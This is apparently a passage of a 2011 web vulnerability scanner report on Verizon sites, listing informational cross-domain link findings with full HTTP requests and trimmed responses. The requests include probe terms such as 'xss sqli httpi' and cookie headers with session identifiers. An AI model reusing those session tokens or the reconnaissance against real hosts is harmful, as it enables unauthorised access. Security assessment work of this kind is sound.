<li><a href="http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml" name="&lpos=topnav">Virtual Tours (Demos)</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml" name="&lpos=topnav">Webinars & Videos</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml" name="&lpos=topnav">White Papers</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml" name="&lpos=topnav">Thought Leadership</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/info/thinkforward/">Think Forward</a>
...[SNIP]...
<td onMouseOver="if(self.vzDD)vzDD(this);" onMouseOut="if(self.vzDO)vzDO(this);" class="col4"><a href="http://www.verizonbusiness.com/about/" name="&lpos=topnav">About Us</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/about/company/">Our Company</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/company/executives/">Executive Team</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/company/history/">History</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/about/network/">Global Network</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/about/ipinnovation/">IP Innovation</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/about/products/">Product Scope</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/about/environment/">Green Initiatives</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/about/news/">News Center</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/news/globalarchive/">Global Archive</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/news/presskits/">Press Kits</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/news/media/">Media Contacts</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/news/fast/">Quick Profile</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/news/network/">Network Facts</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/news/podcasts/">Podcasts</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/about/events/">Global Events</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.jobs/">Career Center</a>
...[SNIP]...
<td onMouseOver="if(self.vzDD)vzDD(this);" onMouseOut="if(self.vzDO)vzDO(this);" class="col5"><a href="http://www.verizonbusiness.com/support/" name="&lpos=topnav">Support</a></td>
<td onMouseOver="if(self.vzDD)vzDD(this);" onMouseOut="if(self.vzDO)vzDO(this);" class="col6"><a href="http://www.verizonbusiness.com/support/myaccount/" name="&lpos=topnav">Manage My Account</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="https://customercenter.verizonbusiness.com">Enterprise Center Sign In</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/support/myaccount/tools/">Customer Enablement Tools</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/support/myaccount/tools/center/">Online service management tools</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/support/myaccount/tools/ebonding/">System integration to service management tools</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/support/myaccount/tools/edibilling/">Electronic billing detail publishing</a>
...[SNIP]...
<h3><a href="http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml" name="&lid=Verizon Business News: Verizon and IBM Launch Private Cloud-Based Managed Data Protection Solution&lpos=natural_1">Verizon Business News: Verizon and IBM Launch Private Cloud-Based Managed Data Protection Solution</a>
...[SNIP]...
<h3><a href="http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud-Based+Managed+Data+Protection+Solution.xml" name="&lid=Verizon Business News: Verizon and IBM Launch Private Cloud-Based Managed Data Protection Solution&lpos=natural_2">Verizon Business News: Verizon and IBM Launch Private Cloud-Based Managed Data Protection Solution</a>
...[SNIP]...
<h3><a href="http://www.verizonbusiness.com/us/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml" name="&lid=Verizon Business News: Verizon and IBM Launch Private Cloud-Based Managed Data Protection Solution&lpos=natural_3">Verizon Business News: Verizon and IBM Launch Private Cloud-Based Managed Data Protection Solution</a>
...[SNIP]...

<script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/wz_tooltip.js"></script>
<script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/tip_balloon.js"></script>
...[SNIP]...
<li class="top"><a href="http://www.verizonbusiness.com/us/">United States</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/ar/">Argentina</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/au/">Australia</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/at/">Austria</a></li>
<li><a href="http://www.verizonbusiness.com/be/">Belgium</a></li>
<li><a href="http://www.verizonbusiness.com/br/">Brazil</a></li>
<li><a href="http://www.verizonbusiness.com/ca/">Canada</a></li>
<li><a href="http://www.verizonbusiness.com/cl/">Chile</a></li>
<li><a href="http://www.verizonbusiness.com/cn/">China</a></li>
<li><a href="http://www.verizonbusiness.com/co/">Colombia</a></li>
<li><a href="http://www.verizonbusiness.com/dk/">Denmark</a></li>
<li><a href="http://www.verizonbusiness.com/fi/">Finland</a></li>
<li><a href="http://www.verizonbusiness.com/fr/">France</a></li>
<li><a href="http://www.verizonbusiness.com/de/">Germany</a></li>
<li><a href="http://www.verizonbusiness.com/hk/">Hong Kong</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/in/">India</a></li>
<li><a href="http://www.verizonbusiness.com/ie/">Ireland</a></li>
<li><a href="http://www.verizonbusiness.com/it/">Italy</a></li>
<li><a href="http://www.verizonbusiness.com/jp/">Japan</a></li>
<li><a href="http://www.verizonbusiness.com/kr/">Korea</a></li>
<li><a href="http://www.verizonbusiness.com/mx/">Mexico</a></li>
<li><a href="http://www.verizonbusiness.com/nl/">Netherlands</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/nz/">New Zealand</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/no/">Norway</a></li>
<li><a href="http://www.verizonbusiness.com/pa/">Panama</a></li>
<li><a href="http://www.verizonbusiness.com/pt/">Portugal</a></li>
<li><a href="http://www.verizonbusiness.com/sg/">Singapore</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/es/">Spain</a></li>
<li><a href="http://www.verizonbusiness.com/se/">Sweden</a></li>
<li><a href="http://www.verizonbusiness.com/ch/">Switzerland</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/tw/">Taiwan</a></li>
<li><a href="http://www.verizonbusiness.com/uk/">United Kingdom</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/us/">United States </a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/ve/">Venezuela</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/countries/">All Countries...</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/">Worldwide Site</a>
...[SNIP]...
<li><a name="&lpos=footer" href="http://www.verizonbusiness.com/terms/">Legal Notices</a>
...[SNIP]...
<li><a name="&lpos=footer" href="http://www.verizonbusiness.com/sitemap/">Site Map</a>
...[SNIP]...
</script><script language="javascript1.1" src="http://www.verizonbusiness.com/templates/hbx.js"></script>
...[SNIP]...

15.28. http://search.verizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.verizon.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://search.verizon.com/?rv=r&tp=r&q=xss%20sqli%20httpi

The response contains the following links to other domains:

http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css
http://content.atomz.com/pb00002f7b/publish/includes/js/gn_engine.js
http://content.atomz.com/pb00002f7b/publish/includes/js/search.js
http://content.atomz.com/pb000035a2/publish/includes/css/default.css
http://statse.webtrendslive.com/dcsi8dupuerp17vzhd59b2lwc_8u5u/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.0.0
http://www.bbbonline.org/cks.asp?id=108072593112
http://www.thinkfinity.org/
http://www.truste.org/ivalidate.php?url=www.verizon.com&sealid=101
http://www.verizonwireless.com/
http://www.verizonwireless.com/b2c/

Request

GET /?rv=r&tp=r&q=xss%20sqli%20httpi HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; WT_FPC=id=28b61e607d5af813da51315275720760:lv=1315275720760:ss=1315275720760; CP=null*; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:39:09 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 135547

       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Verizon | Site Search for xss sqli httpi</title>
   <meta http-equiv="content-type" content="text/html; c
...[SNIP]...
</script>

   <link rel="stylesheet" type="text/css" href="http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css" />
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/gn_engine.js"></script>
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/search.js"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://content.atomz.com/pb000035a2/publish/includes/css/default.css" />

<script type="text/javaScript">
...[SNIP]...
<noscript><img alt="" style="border-width:0;" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsi8dupuerp17vzhd59b2lwc_8u5u/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.0.0" /></noscript>
...[SNIP]...
<li><a class="scbtnav" title="Verizon Wireless" href="http://www.verizonwireless.com/" name="&lid=hp_wireless_tab">Wireless</a>
...[SNIP]...
<p><a href="http://www.verizonwireless.com/b2c/" name="&lid=overlay_phone_wireless"><img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" alt="" border="0" class="scbppimg scbppvzw" />
...[SNIP]...
</span>
               <a href="http://www.thinkfinity.org/" target="_blank">Verizon Thinkfinity</a>
...[SNIP]...

           <a href="http://www.truste.org/ivalidate.php?url=www.verizon.com&sealid=101" target="_blank" name="&lid=TRUSTeFooter">
               <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="TRUSTe Certified Privacy" title="TRUSTe Certified Privacy" class="ghfpics gftruste" />
...[SNIP]...

           <a href="http://www.bbbonline.org/cks.asp?id=108072593112" target="_blank" name="&lid=BBBFooter">
               <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="Better Business Bureau: Accredited Business" title="Better Business Bureau: Accredited Business" class=
...[SNIP]...
</span><a href="http://www.thinkfinity.org/" target="_blank">Verizon Thinkfinity</a>
...[SNIP]...

   <a href="http://www.truste.org/ivalidate.php?url=www.verizon.com&sealid=101" target="_blank" name="&lid=TRUSTeFooter">
   <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="TRUSTe Certified Privacy" title="TRUSTe Certified Privacy" class="ghfpics gftruste" />
...[SNIP]...

   <a href="http://www.bbbonline.org/cks.asp?id=108072593112" target="_blank" name="&lid=BBBFooter">
       <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="Better Business Bureau: Accredited Business" title="Better Business Bureau: Accredited Business" class="g
...[SNIP]...

15.29. http://search.verizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.verizon.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://search.verizon.com/?market=94531+zz&q=oss+sq&rv=b&st=zz&tp=c&u1=q

The response contains the following links to other domains:

http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css
http://content.atomz.com/pb00002f7b/publish/includes/js/gn_engine.js
http://content.atomz.com/pb00002f7b/publish/includes/js/search.js
http://content.atomz.com/pb00002f7b/publish/includes/js/tip_balloon.js
http://content.atomz.com/pb00002f7b/publish/includes/js/wz_tooltip.js
http://content.atomz.com/pb000035a2/publish/includes/css/default.css
http://statse.webtrendslive.com/dcsi8dupuerp17vzhd59b2lwc_8u5u/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.0.0
http://www.bbbonline.org/cks.asp?id=108072593112
http://www.thinkfinity.org/
http://www.truste.org/ivalidate.php?url=www.verizon.com&sealid=101
http://www.verizonwireless.com/

Request

GET /?market=94531+zz&q=oss+sq&rv=b&st=zz&tp=c&u1=q HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?tp=c&rv=b&q=xss%20sq
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; vsrecentsearches=wss~xss~xss%20sq~~; CP=null*; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:21:57 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 132824

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Verizon | Site Search for oss sq</title>
   <meta http-equiv="content-type" content="text/html; charset=iso-
...[SNIP]...
</script>

   <link rel="stylesheet" type="text/css" href="http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css" />
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/gn_engine.js"></script>
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/search.js"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://content.atomz.com/pb000035a2/publish/includes/css/default.css" />

<script type="text/javaScript">
...[SNIP]...
<noscript><img alt="" style="border-width:0;" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsi8dupuerp17vzhd59b2lwc_8u5u/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.0.0" /></noscript>
...[SNIP]...
<li><a class="scbtnav" title="Verizon Wireless" href="http://www.verizonwireless.com/" name="&lid=hp_wireless_tab">Wireless</a>
...[SNIP]...

<script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/wz_tooltip.js"></script>
<script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/tip_balloon.js"></script>
...[SNIP]...
</span>
               <a href="http://www.thinkfinity.org/" target="_blank">Verizon Thinkfinity</a>
...[SNIP]...

           <a href="http://www.truste.org/ivalidate.php?url=www.verizon.com&sealid=101" target="_blank" name="&lid=TRUSTeFooter">
               <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="TRUSTe Certified Privacy" title="TRUSTe Certified Privacy" class="ghfpics gftruste" />
...[SNIP]...

           <a href="http://www.bbbonline.org/cks.asp?id=108072593112" target="_blank" name="&lid=BBBFooter">
               <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="Better Business Bureau: Accredited Business" title="Better Business Bureau: Accredited Business" class=
...[SNIP]...
</span><a href="http://www.thinkfinity.org/" target="_blank">Verizon Thinkfinity</a>
...[SNIP]...

   <a href="http://www.truste.org/ivalidate.php?url=www.verizon.com&sealid=101" target="_blank" name="&lid=TRUSTeFooter">
   <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="TRUSTe Certified Privacy" title="TRUSTe Certified Privacy" class="ghfpics gftruste" />
...[SNIP]...

   <a href="http://www.bbbonline.org/cks.asp?id=108072593112" target="_blank" name="&lid=BBBFooter">
       <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="Better Business Bureau: Accredited Business" title="Better Business Bureau: Accredited Business" class="g
...[SNIP]...

15.30. http://smallbusiness.verizon.com/scripts/combined.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://smallbusiness.verizon.com
Path:	/scripts/combined.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://smallbusiness.verizon.com/scripts/combined.aspx?type=peheader&add=

The response contains the following links to other domains:

http://www.adobe.com/go/getflashplayer
http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif

Request

GET /scripts/combined.aspx?type=peheader&add= HTTP/1.1
Host: smallbusiness.verizon.com
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; ASP.NET_SessionId=lhx45c55scwk1s45ya0xy155

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 05 Sep 2011 22:16:24 GMT
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 196673

var MooTools={'version':'1.2.4','build':'0d9113241a90b9cd5643b926795852a2026710d4'};var Native=function(options){options=options||{};var name=options.name;var legacy=options.legacy;var protect=option
...[SNIP]...
<br><a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /><br>
...[SNIP]...

15.31. http://webmail.verizon.net/signin/Login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizon.net
Path:	/signin/Login.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011

The response contains the following link to another domain:

http://www.verizonwireless.com/b2c/index.html

Request

Response

15.32. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizonemail.net
Path:	/webmail/servlet/HttpNimletDriver

Issue detail

The page was loaded from a URL containing a query string:

http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver?nimlet=LoginNimlet&site=B

The response contains the following links to other domains:

http://business.verizon.net/
http://business.verizon.net/SMBPortalWeb/dnefaq
http://business.verizon.net/marketinghome/
http://business.verizon.net/misc/email_login.asp
http://business.verizon.net/policies/
http://business.verizon.net/policies/privacy.asp
http://business.verizon.net/tools/
http://business.verizon.net/tools/account_management/
http://business.verizon.net/tools/elearning/
http://business.verizon.net/tools/resources/
http://businesshelp.verizon.net/
http://dslstart.verizon.net/vzn.biz/
http://www.verizon.com/
http://www22.verizon.com/ForHomeDSL/channels/dsl/forhomedsl.asp
http://www22.verizon.com/copyright/

Request

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0.0_03c
Date: Mon, 05 Sep 2011 22:41:55 GMT
Content-type: text/html
Expires: Wed, 31 Dec 1969 18:00:00 CST
Pragma: No-cache
Cache-control: no-cache
Content-Length: 21251

<html>

<head>
<title>Verizon E-Mail</title>
<meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l
gen true for "http://web.managedmail
...[SNIP]...
<td background="../static/images/topnav_level1background.gif" align="center">
  <a class="topnavl1" href="http://business.verizon.net/">Home</a>
...[SNIP]...
<td background="../static/images/topnav_level1background.gif" align="center">
  <a class="topnavl1" href="http://businesshelp.verizon.net/">Help & Support</a>
...[SNIP]...
<td background="../static/images/topnav_level1background.gif" align="center">
  <a class="topnavl1" href="http://business.verizon.net/marketinghome/">Products & Services</a>
...[SNIP]...
<td background="../static/images/topnav_level1_tabbg.gif" align="center">
  <a class="topnavl1selected" href="http://business.verizon.net/tools/">Tools & Resources</a>
...[SNIP]...
<td>
 <a class="topnavl2" href="http://business.verizon.net/tools/elearning/" >E-Learning</a>
...[SNIP]...
<td>
 <a class="topnavl2" href="http://business.verizon.net/tools/resources/" >Resources</a>
...[SNIP]...
<td>
 <a class="topnavl2" href="http://business.verizon.net/tools/account_management/" >Account Management</a>
...[SNIP]...
<td>
 <a class="topnavl2selected" href="http://business.verizon.net/misc/email_login.asp" >E-Mail</a>
...[SNIP]...
<td>
 <a class="topnavl2" href="http://dslstart.verizon.net/vzn.biz/" >Advanced Web Search</a>
...[SNIP]...
</b>. Specific details will be communicated via e-mail in the coming weeks. To learn more about Google Apps for Verizon, click here: <a href="http://business.verizon.net/SMBPortalWeb/dnefaq" target="_blank">http://business.verizon.net/SMBPortalWeb/dnefaq</a>
...[SNIP]...
<td width="80" valign="top">
<a href="http://www.verizon.com" target="_blank"><img src="../static/images/footer_logo_verizon.gif" width="80" height="56" alt="Verizon - Make progress every day" border="0"/>
...[SNIP]...
<br />
<a class="footerlinks" href="http://business.verizon.net/">Home</a>
...[SNIP]...
</span>
<a class="footerlinks" href="http://businesshelp.verizon.net/">Help & Support</a>
...[SNIP]...
</span>
<a class="footerlinks" href="http://business.verizon.net/marketinghome/">Products & Services</a>
...[SNIP]...
</span>
<a class="footerlinks" href="http://business.verizon.net/tools/">Tools & Resources</a>
...[SNIP]...
</span>
<a class="footerlinks" href="http://www22.verizon.com/ForHomeDSL/channels/dsl/forhomedsl.asp" target="_blank">For Your Home</a>
...[SNIP]...
<span class="legal">
<a href="http://business.verizon.net/policies/privacy.asp">Verizon Privacy Policy</a>
|
<a href="http://www22.verizon.com/copyright/" target="_blank">Copyright 2003 Verizon</a>
...[SNIP]...
<br />
Use of Verizon Online's Internet access services and Web sites are subject to user compliance with
our <a href="http://business.verizon.net/policies/">Policies</a>
...[SNIP]...

15.33. http://www.connecttoverizon.com/loginFailed.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/loginFailed.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.connecttoverizon.com/loginFailed.html?uname=xss&Go.x=26&Go.y=3&loginPageUrl=http%3A%2F%2Fwww.connecttoverizon.com&Go=Submit&loginFailedUrl=http%3A%2F%2Fwww.connecttoverizon.com%2FloginFailed.html&id=1053268

The response contains the following links to other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://pcwhitefencecom.112.2o7.net/b/ss/pcwhitefencecom/1/H.1--NS/%20
http://www.connecttoatt.com/
http://www.connecttocavalier.com/
http://www.connecttocenturytel.com/
http://www.connecttocincinnatibell.com/
http://www.connecttoqwest.com/
http://www.connecttowindstream.com/
http://www.embarqmove.com/
http://www.surveymonkey.com/s.aspx?sm=HN_2fHokPITw5_2flbeNXIdO1w_3d_3d
http://www.whitefence.com/bpcfaq/wfnetwork.html
http://www.whitefence.com/resize/qsrimages/providerlogos/originals/poweredbywhitefence.100.png
http://www.whitefence.com/scripts/moo/mootools.v1.2b2.js
http://www.whitefence.com/static/mrc.js
http://www.whitefence.com/static/omniture.js
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.WHITEFENCE.COM&lang=en
https://www.whitefence.com/WebObjects/WhiteFenceService.woa/wa/forgotPassword?id=1053268&appName=otto&loginPageUrl=https://www.whitefence.com/WebObjects/WhiteFenceService.woa

Request

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:20:17 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:20:17 GMT
X-Powered-By: PHP/5.2.3
Content-Type: text/html
Content-Length: 12507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Failed | C
...[SNIP]...
<LINK REL="SHORTCUT ICON" HREF="http://www.connecttoverizon.com/favicon.ico">

<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/static/mrc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/scripts/moo/mootools.v1.2b2.js"></script>
...[SNIP]...
<br />
<a class="lostpass" href="https://www.whitefence.com/WebObjects/WhiteFenceService.woa/wa/forgotPassword?id=1053268&appName=otto&loginPageUrl=https://www.whitefence.com/WebObjects/WhiteFenceService.woa" target="_blank">Lost Password?
<input type=hidden value="1053268" name=id>
...[SNIP]...
<div id="trusticons">
<a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.WHITEFENCE.COM&lang=en" target="_blank"><img src="http://www.connecttoverizon.com/objects/images/trust/verisign.gif" alt="certified by verisign" class="trustseals"></a>
<a target="_blank" href="http://www.whitefence.com/bpcfaq/wfnetwork.html" target="_blank"><img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/poweredbywhitefence.100.png" class="trustseals"></a>
...[SNIP]...
<li><a href="http://www.connecttoatt.com" target="_blank">AT&T</a></li>
<li><a href="http://www.connecttoqwest.com" target="_blank">Qwest</a></li>
<li><a href="http://www.embarqmove.com" target="_blank">EMBARQ</a></li>
<li><a href="http://www.connecttowindstream.com" target="_blank">Windstream</a>
...[SNIP]...
<li><a href="http://www.connecttocenturytel.com" target="_blank">CenturyTel</a>
...[SNIP]...
<li><a href="http://www.connecttocavalier.com" target="_blank">Cavalier</a></li>
<li class="last"><a href="http://www.connecttocincinnatibell.com" target="_blank">Cincinnati Bell</a>
...[SNIP]...
<li class="last"><a href="http://www.surveymonkey.com/s.aspx?sm=HN_2fHokPITw5_2flbeNXIdO1w_3d_3d" target="_blank">Rate this Site</a>
...[SNIP]...

<script type="text/javascript" language="Javascript" src="http://www.whitefence.com/static/omniture.js"></script>
...[SNIP]...
<noscript><img
